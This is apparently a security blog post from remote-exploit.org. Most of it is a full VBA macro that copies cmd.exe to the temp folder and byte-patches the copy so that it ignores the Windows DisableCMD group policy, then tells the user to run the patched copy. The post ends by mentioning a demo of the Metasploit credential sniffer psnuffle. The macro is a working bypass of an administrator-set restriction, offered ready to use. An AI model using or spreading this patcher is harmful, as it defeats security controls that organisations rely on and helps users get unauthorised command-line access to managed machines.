Integrated blog into remote-exploit.org
greetings
max
VBA Macro to remove DisableCMD CMD.EXE restriction from Max Moser on Vimeo.
Short video showing my VBA byte patcher written to overcome DisableCMD policy setting. Sorry but i at least expected a fail safe behavior.
Sub patchcmd()
Dim Sourcefile As String, TargetFile As String, Windir As String, Tempdir As String
Dim F1 As Integer, F2 As Integer
Dim bytepattern(19) As Byte
Dim WshShell As Object
Set WshShell = CreateObject("WScript.Shell")
Windir = WshShell.ExpandEnvironmentStrings("%WinDir%")
Tempdir = WshShell.ExpandEnvironmentStrings("%temp%")
bytepattern(0) = &H44 'D
bytepattern(1) = &H0
bytepattern(2) = &H69 'i
bytepattern(3) = &H0
bytepattern(4) = &H73 's
bytepattern(5) = &H0
bytepattern(6) = &H61 'a
bytepattern(7) = &H0
bytepattern(8) = &H62 'b
bytepattern(9) = &H0
bytepattern(10) = &H6C 'l
bytepattern(11) = &H0
bytepattern(12) = &H65 'e
bytepattern(13) = &H0
bytepattern(14) = &H43 'C
bytepattern(15) = &H0
bytepattern(16) = &H4D 'M
bytepattern(17) = &H0
bytepattern(18) = &H44 'D
Dim fileoffset As Long
fileoffset = 0
Dim patternoffset As Long
patternoffset = 0
Dim gotbad As Boolean
gotbad = False
Sourcefile = Windir & "\system32\cmd.exe"
Destfile = Tempdir & "\dmc.exe"
Dim tmpbyte As Byte
If Dir(Sourcefile) = "" Then Exit Sub
FileCopy Sourcefile, Destfile
F1 = FreeFile
Open Sourcefile For Binary As F1
F2 = FreeFile
Open Destfile For Binary As F2
While Not EOF(F1)
gotbad = False
Get #F1, , tmpbyte
If tmpbyte = bytepattern(patternoffset) Then
fileoffset = (Seek(F1) - 1)
While (gotbad = False)
Get #F1, , tmpbyte
patternoffset = patternoffset + 1
If tmpbyte = bytepattern(patternoffset) Then
If patternoffset > 18 Then
'Debug.Print "Found DisableCMD and position: " & fileoffset & "Patching it now"
Put #F2, fileoffset + 6, &H34
Close F1
Close F2
MsgBox "Yeah, run it from: " & Destfile, vbOKOnly, "CMD.EXE patched"
End
End If
Else
patternoffset = 0
gotbad = True
End If
Wend
End If
Wend
Close F1
Close F2
End Sub
Psnuffle credentials sniffing module demo from Max Moser on Vimeo.
With psnuffle metasploit got a credential sniffer in place. Its easy to use and extens. Writing a new module just takes some minutes.